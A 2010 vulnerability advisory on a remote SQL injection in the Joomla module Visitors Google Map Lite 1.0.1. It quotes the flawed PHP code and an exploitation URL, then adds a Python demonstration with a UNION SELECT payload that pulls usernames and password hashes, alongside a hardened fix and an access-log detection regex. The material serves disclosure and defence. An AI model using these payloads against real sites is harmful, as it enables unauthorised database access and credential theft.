Visitors Google Map Lite 1.0.1 (FREE) (module mod_visitorsgooglemap Remote SQL Injection)
=========================================================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios[at]gmail[dot]com
- Group : LatinHackTeam
- Date : 2010-09-08
- Where : From Remote

-------------------------------------------------------------------------------------

Affected software description

Application : Visitors Google Map Lite 1.0.1 (FREE) (module: mod_visitorsgooglemap)
Developer : Serdar Gökkus
Compatibility : Joomla 1.5 Native
License : GPLv2 or later
Date Added : Sunday August 29, 2010 01:14:14
Download : http://www.comlantis.com/download/doc_download/2-visitors-google-map-lite-101-free.html

I. BACKGROUND

This extension tracks the visitors of your site in real time and displays their locations on a Google Map. It uses three main technologies:

- the Google Maps API
- AJAX
- the IPInfoDB IP geolocation API

Content of the VisitorsGoogleMap package: the extension contains one Joomla component and two Joomla modules.

com_visitorsgooglemap: this component creates the database table during installation and removes it cleanly on uninstallation.

mod_visitorsgooglemap: this module displays the Google Map in the desired module position of your template and tracks the visitors of your Joomla page on the map.

mod_visitorsgooglemap_agent: this module updates the visitor information in the database.

II. DESCRIPTION

SQL injection vulnerabilities exist in the mod_visitorsgooglemap module.

III. ANALYSIS

The bug is in the following file, at the indicated lines:

/mod_visitorsgooglemap/map_data.php

[16] if ($_GET['action'] == 'listpoints')
[17] {
[18]     $lastMarkerID = $_GET['lastMarkerID'];
[19]     ini_set('default_mimetype','text/xml'); // sometimes necessary
[20]     header ('Content-Type: text/xml');       // not always sufficient
[21]     echo '<?xml version="1.0" ?>';
[22]     echo '<xmlresponse>';
[23]     $database =& JFactory::getDBO();
[24]     $query = "SELECT * FROM #__visitorsgooglemap_location where id > $lastMarkerID order by id";

Explanation: as line [24] shows, $lastMarkerID is taken straight from $_GET on line [18] and is never filtered or cast to an integer; it is interpolated unquoted into the WHERE clause, so anything appended after the numeric value becomes part of the query. Because the parameter sits in a numeric context there is no quote to break out of: a payload such as a UNION SELECT with the same number of columns as the location table is enough. The rows the query returns are echoed back in the XML response, so injected data is delivered directly to the requester, and since the module fetches this script via AJAX for ordinary visitors, no authentication is involved. Casting the parameter to an integer before building the query (for example with (int) or JRequest::getInt() in Joomla 1.5) closes the hole.

IV. EXPLOITATION

http://site/path/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0{sql}

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
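The following is an added example, not code from the advisory or from the extension. It models the query construction of map_data.php line [24] in Python against an in-memory SQLite database so the injection from section IV can be observed, shows the integer cast that fixes it, and flags the attack pattern in web-server access logs. The table layout, the jos_ prefix, the user table and the log lines are all constructed for this example; the real #__visitorsgooglemap_location schema is not shown in the advisory.

```python
"""Added example: vulnerable vs. hardened construction of the listpoints query,
plus a simple log check. Not part of the advisory or the extension's code."""
import re
import sqlite3
import urllib.parse

TABLE_PREFIX = "jos_"  # assumed Joomla 1.5 default for the #__ placeholder


def build_query_vulnerable(last_marker_id: str) -> str:
    """Mirror of line [24]: the parameter is interpolated unquoted and unfiltered."""
    return (f"SELECT * FROM {TABLE_PREFIX}visitorsgooglemap_location "
            f"where id > {last_marker_id} order by id")


def build_query_hardened(last_marker_id: str) -> str:
    """Accept only a plain integer. This is stricter than PHP's (int) cast, which
    would silently truncate '0 UNION ...' to 0; either way the SQL never sees
    the payload."""
    if not re.fullmatch(r"\d+", last_marker_id.strip()):
        raise ValueError("lastMarkerID must be a non-negative integer")
    return (f"SELECT * FROM {TABLE_PREFIX}visitorsgooglemap_location "
            f"where id > {int(last_marker_id)} order by id")


def hardened_rejects(last_marker_id: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        build_query_hardened(last_marker_id)
        return False
    except ValueError:
        return True


def make_db() -> sqlite3.Connection:
    """Constructed fixture: a location table (assumed layout) plus a second
    table whose rows an attacker would want to read."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {TABLE_PREFIX}visitorsgooglemap_location
            (id INTEGER PRIMARY KEY, ip TEXT, lat REAL, lng REAL);
        INSERT INTO {TABLE_PREFIX}visitorsgooglemap_location VALUES
            (1, '203.0.113.5', -12.05, -77.04),
            (2, '198.51.100.7', -34.60, -58.38);
        CREATE TABLE {TABLE_PREFIX}users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO {TABLE_PREFIX}users VALUES
            (62, 'admin', 'constructed-hash-1'),
            (63, 'editor', 'constructed-hash-2');
    """)
    return db


# Payload in the shape of section IV (lastMarkerID=0{sql}). The UNION must
# supply as many columns as the location table has (four here).
PAYLOAD = f"0 UNION SELECT id, username, password, 0 FROM {TABLE_PREFIX}users"


def run_listpoints(db: sqlite3.Connection, last_marker_id: str, hardened: bool = False):
    """Execute the query the way the script would and return all rows."""
    build = build_query_hardened if hardened else build_query_vulnerable
    return db.execute(build(last_marker_id)).fetchall()


# Constructed access-log lines in Apache combined-log style: one legitimate
# poll from the module's AJAX code and one injection attempt.
SAMPLE_LOG = [
    '10.0.0.1 - - [08/Sep/2010:10:00:01 +0000] "GET /modules/mod_visitorsgooglemap/'
    'map_data.php?action=listpoints&lastMarkerID=17 HTTP/1.1" 200 512',
    '10.0.0.2 - - [08/Sep/2010:10:00:09 +0000] "GET /modules/mod_visitorsgooglemap/'
    'map_data.php?action=listpoints&lastMarkerID=0%20UNION%20SELECT%20id,username,'
    'password,0%20FROM%20jos_users HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(r'map_data\.php\?[^ "]*lastMarkerID=(?P<val>[^& "]*)')


def flag_requests(log_lines):
    """Return the decoded lastMarkerID values that are not plain integers."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        value = urllib.parse.unquote_plus(m.group("val"))
        if not re.fullmatch(r"\d+", value):
            hits.append(value)
    return hits


if __name__ == "__main__":
    db = make_db()
    for row in run_listpoints(db, PAYLOAD):
        print(row)                      # location rows followed by user rows
    print(hardened_rejects(PAYLOAD))    # True
    print(flag_requests(SAMPLE_LOG))
```

Run against the constructed database, the vulnerable builder returns the two location rows followed by the two user rows, because the UNION result is merged before the "order by id" is applied; the hardened builder refuses the same value. The log check only looks at the lastMarkerID parameter, which is enough for this advisory's pattern but would not catch payloads moved into other parameters.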